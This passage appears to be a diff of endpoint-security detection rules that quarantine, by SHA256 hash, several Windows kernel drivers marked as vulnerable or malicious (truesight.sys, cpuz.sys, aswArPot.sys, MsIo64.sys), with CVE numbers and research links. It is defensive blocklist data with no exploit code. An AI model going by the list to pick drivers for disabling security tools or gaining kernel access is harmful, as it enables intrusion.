+ "last_update": "2026-03-23T11:45:29.615714Z",
+ "creation_date": "2026-03-23T11:45:29.615716Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.615721Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ce89124d29b5e562bbcc2f07b1dfac0f22dd66ad3deb32dd32c8c138a3739ef8",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1bb75656-8ea6-5f19-8654-aae24887f9eb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.458898Z",
+ "creation_date": "2026-03-23T11:45:30.458902Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.458910Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "11b0e5d7971aaa2a6c4621f068af390f291fd796c202369605c2e0c7940f50ee",
+ "comment": "Vulnerable Kernel Driver (aka nscm.sys) [https://www.loldrivers.io/drivers/351ff5ca-f07b-4eb6-9300-d5d31514defb/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1bb8521e-2cd0-5496-8637-dfd4b0e2affb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.472723Z",
+ "creation_date": "2026-03-23T11:45:30.472726Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.472735Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c8f0bb5d8836e21e7a22a406c69c01ba7d512a808c37c45088575d548ee25caa",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1bb94e93-3293-568c-bd63-e2f0891ba078",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.472317Z",
+ "creation_date": "2026-03-23T11:45:31.472321Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.472330Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "960af5beee5b2f08932334d7387d7bf50bfb02885b12f2c5ade8edc83d5eca0a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1bbbecd3-d5db-5980-9652-e817e527c9cc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.981489Z",
+ "creation_date": "2026-03-23T11:45:29.981491Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.981496Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c640930c29ea3610a3a5cebee573235ec70267ed223b79b9fa45a80081e686a4",
+ "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1bbd4c1d-6ff1-5a05-ab0a-d2451ca0977a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.487755Z",
+ "creation_date": "2026-03-23T11:45:31.487757Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.487763Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "67483af4d2a341aa05f09ddaff08d42ae8206a08707bc27cddab41622a5d8fd5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1bbd845a-45de-598a-9baa-bf43f2320a53",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.614058Z",
+ "creation_date": "2026-03-23T11:45:29.614060Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.614066Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "525d9b51a80ca0cd4c5889a96f857e73f3a80da1ffbae59851e0f51bdfb0b6cd",
+ "comment": "MICSYS Technology driver (aka MsIo64.sys) [CVE-2019-18845] [https://github.com/kkent030315/MsIoExploit] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1bc09a8b-1523-5450-8f66-b1f802d62c16",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.831476Z",
+ "creation_date": "2026-03-23T11:45:30.831479Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.831484Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fc288b9b40e3d0dbc5fa3df046e4ce61f1bd75086bb28233081c9cb6138d9103",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1bc360f3-955e-5043-bc18-2e995fb89da2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.817070Z",
+ "creation_date": "2026-03-23T11:45:30.817072Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.817077Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7a1105548bfc4b0a1b7b891cde0356d39b6633975cbcd0f2e2d8e31b3646d2ca",
+ "comment": "Vulnerable Kernel Driver (aka AODDriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1bc4e500-1aa6-56ce-b677-5852a3efc0a7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.145307Z",
+ "creation_date": "2026-03-23T11:45:31.145309Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.145315Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c0d52f1953a3edf62f454c7bdcfa714f53a04e475e4b08696763e2948edf82fb",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1bcb951e-d64b-53e0-ba14-242cb738eac4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.154622Z",
+ "creation_date": "2026-03-23T11:45:31.154623Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.154629Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5e625e5a2b33bb6051990b275e7a2381bc6cb8606504bfde5eb6dee08b24b6f6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1bcbd8cb-d97d-52a0-95df-63d11648176f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.833174Z",
+ "creation_date": "2026-03-23T11:45:30.833178Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.833186Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "17b055841b41b0c1bc4348ff8a35f95c9e9e69015dfb479f757f20173cb49123",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1bdc5030-e696-5a15-8a22-c757fb258c60",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.969151Z",
+ "creation_date": "2026-03-23T11:45:29.969153Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.969158Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2732050a7d836ae0bdc5c0aea4cdf8ce205618c3e7f613b8139c176e86476d0c",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1bf6e305-8e43-57b6-80a4-c242b5ba4881",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.616521Z",
+ "creation_date": "2026-03-23T11:45:29.616525Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.616533Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "38d87b51f4b69ba2dae1477684a1415f1a3b578eee5e1126673b1beaefee9a20",
+ "comment": "American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and amifldrv64.sys) [https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1bfad0c2-7782-57f0-a8d7-947e6025d272",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.815419Z",
+ "creation_date": "2026-03-23T11:45:31.815421Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.815426Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cff54479f814186be34225d85bc0a8106f6db9e0a250c3d8743c3d683a3bc695",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1c0c52b3-548b-5b83-b692-846bf02e1202",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.150889Z",
+ "creation_date": "2026-03-23T11:45:31.150891Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.150896Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4e553ee6a6caa39a96105a89518f69a891ff42defa190784376205b0ff824050",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1c0f20d4-8602-59a4-8b7f-c440733e7405",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.976318Z",
+ "creation_date": "2026-03-23T11:45:29.976320Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.976326Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9bb09752cf3a464455422909edef518ac18fe63cf5e1e8d9d6c2e68db62e0c87",
+ "comment": "Malicious attestation-signed Drivers (aka NodeDriver.sys, 4.sys, Air_SYSTEM10.sys etc.) [https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1c158798-8f32-530b-8842-5c2aede4c5f8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.979256Z",
+ "creation_date": "2026-03-23T11:45:29.979258Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.979263Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cb57f3a7fe9e1f8e63332c563b0a319b26c944be839eabc03e9a3277756ba612",
+ "comment": "Vulnerable Kernel Driver (aka d2.sys) [https://www.loldrivers.io/drivers/d05a0a6c-c037-4647-99ac-c41593190223/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1c1f9c60-0057-5b73-933d-11a4f4631f2e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.816474Z",
+ "creation_date": "2026-03-23T11:45:31.816477Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.816485Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1308161256400a94d7314c6adbba7de8b5fe0002e60a8504f5382cc2fa366658",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1c35c763-de95-5287-8880-61f7f69c9f0d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.458750Z",
+ "creation_date": "2026-03-23T11:45:30.458753Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.458762Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "52c7b29023ac2a98b7a9c73de790d820d3d6d095bea0b077d4dad53fa97b0731",
+ "comment": "Vulnerable Kernel Driver (aka nscm.sys) [https://www.loldrivers.io/drivers/351ff5ca-f07b-4eb6-9300-d5d31514defb/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1c36de56-0340-57a6-b3fe-061786879770",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.980532Z",
+ "creation_date": "2026-03-23T11:45:29.980534Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.980540Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7070ee6dd615538ca6a701e7bdc2c23a19b84ae8ca5f9edc6307fef47eb05abb",
+ "comment": "Vulnerable Kernel Driver (aka rzpnk.sys) [https://www.loldrivers.io/drivers/1c6e1d3b-f825-4065-9e0c-83386883e40f/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1c453ef8-654d-59af-aacc-b7ea0e17c893",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.471742Z",
+ "creation_date": "2026-03-23T11:45:30.471745Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.471754Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "eaa5dae373553024d7294105e4e07d996f3a8bd47c770cdf8df79bf57619a8cd",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1c4c0c0a-abc8-55ee-9121-0c85a70395f7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.812063Z",
+ "creation_date": "2026-03-23T11:45:31.812065Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.812071Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
